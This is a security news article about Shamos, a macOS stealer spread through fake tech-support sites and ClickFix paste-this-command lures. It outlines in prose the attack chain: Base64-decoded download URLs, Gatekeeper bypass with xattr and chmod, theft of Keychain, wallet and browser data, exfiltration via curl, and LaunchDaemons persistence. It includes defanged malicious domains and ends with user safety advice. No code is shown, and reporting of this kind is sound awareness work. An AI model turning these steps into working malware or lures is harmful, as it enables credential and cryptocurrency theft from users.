New Shamos Malware Targets Mac Users Through Fake Tech Support Sites

 

Cybersecurity researchers have unearthed a new Mac-targeting malware called Shamos that deceives users through fake troubleshooting guides and repair solutions. This information-stealing malware, developed by the cybercriminal organization "COOKIE SPIDER," represents a variant of the previously known Atomic macOS Stealer (AMOS).

Modus operandi

The malware spreads through ClickFix attacks, which utilize malicious advertisements and counterfeit GitHub repositories to trick victims. Attackers create deceptive websites such as mac-safer[.]com and rescue-mac[.]com that appear to offer legitimate macOS problem-solving assistance. These sites instruct users to copy and paste Terminal commands that supposedly fix common system issues. 

However, these commands actually decode Base64-encoded URLs and retrieve malicious Bash scripts from remote servers. The scripts capture user passwords, download the Shamos executable, and use system tools like 'xattr' and 'chmod' to bypass Apple's Gatekeeper security feature. 

Data theft capabilities

Once installed, Shamos performs comprehensive data collection targeting multiple sensitive areas. The malware searches for cryptocurrency wallet files, Keychain credentials, Apple Notes content, and browser-stored information. It employs anti-virtual machine commands to avoid detection in security sandboxes and uses AppleScript for system reconnaissance.

All stolen data gets compressed into an archive file named 'out.zip' before transmission to the attackers via curl commands. When operating with administrator privileges, Shamos establishes persistence by creating a Plist file in the LaunchDaemons directory, ensuring automatic execution during system startup. 

CrowdStrike's monitoring has detected Shamos attempting infections across more than 300 environments globally since June 2025. The security firm has also observed instances where attackers deployed additional malicious components, including fake Ledger Live cryptocurrency applications and botnet modules. 

Safety measures

Security experts strongly advise Mac users to avoid executing any online commands they don't fully understand. Users should be particularly cautious with GitHub repositories, as the platform hosts numerous malicious projects designed to infect unsuspecting individuals.

For legitimate macOS assistance, users should bypass sponsored search results and instead consult Apple Community forums or the built-in Help system (Cmd + Space → "Help"). ClickFix attacks have proven highly effective across various platforms, appearing in TikTok videos, fake captchas, and bogus Google Meet error messages, making user awareness crucial for prevention.